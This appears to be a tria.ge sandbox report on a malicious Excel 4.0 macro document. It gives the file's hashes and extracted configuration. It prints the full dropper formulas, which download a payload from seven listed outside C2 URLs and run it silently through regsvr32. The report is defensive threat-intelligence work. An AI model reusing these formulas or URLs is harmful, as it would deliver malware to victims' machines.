Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

  • Size

    35KB

  • Sample

    241120-3an3naweqn

  • MD5

    1553fa17f531fd2b7d2d1b76624374e1

  • SHA1

    063eda6f5c07a308df1c9f537179dba64cc7d50c

  • SHA256

    eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

  • SHA512

    704165ba1b90445cb34868eafab50e3ff3fcab6ba53a5982095244c453fd5e326a707a980dda45524b0370969a51d3b579c16e44fcf2adecf8448395752196cf

  • SSDEEP

    768:vrtDp5eCAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooNQ3:vrtlgCUOZZ1ZYpoQ/pMAIY

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/

https://brutobrasil.com.br/pdf/SSscCUKBvL/

https://mdmd.fun/wp-includes/Y00y/

https://appanwendung.com/wp-admin/dvDn7/

https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/

https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/

https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://brutobrasil.com.br/pdf/SSscCUKBvL/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://mdmd.fun/wp-includes/Y00y/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appanwendung.com/wp-admin/dvDn7/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/", "..\xdha.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://brutobrasil.com.br/pdf/SSscCUKBvL/", "..\xdha.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://mdmd.fun/wp-includes/Y00y/", "..\xdha.ocx")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://appanwendung.com/wp-admin/dvDn7/", "..\xdha.ocx")
5
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/", "..\xdha.ocx")
6
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/", "..\xdha.ocx")
7
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/", "..\xdha.ocx")
URLs
xlm40.dropper

https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/

xlm40.dropper

https://brutobrasil.com.br/pdf/SSscCUKBvL/

xlm40.dropper

https://mdmd.fun/wp-includes/Y00y/

xlm40.dropper

https://appanwendung.com/wp-admin/dvDn7/

xlm40.dropper

https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/

xlm40.dropper

https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/

xlm40.dropper

https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/

Targets

    • Target

      eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

    • Size

      35KB

    • MD5

      1553fa17f531fd2b7d2d1b76624374e1

    • SHA1

      063eda6f5c07a308df1c9f537179dba64cc7d50c

    • SHA256

      eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

    • SHA512

      704165ba1b90445cb34868eafab50e3ff3fcab6ba53a5982095244c453fd5e326a707a980dda45524b0370969a51d3b579c16e44fcf2adecf8448395752196cf

    • SSDEEP

      768:vrtDp5eCAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooNQ3:vrtlgCUOZZ1ZYpoQ/pMAIY

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.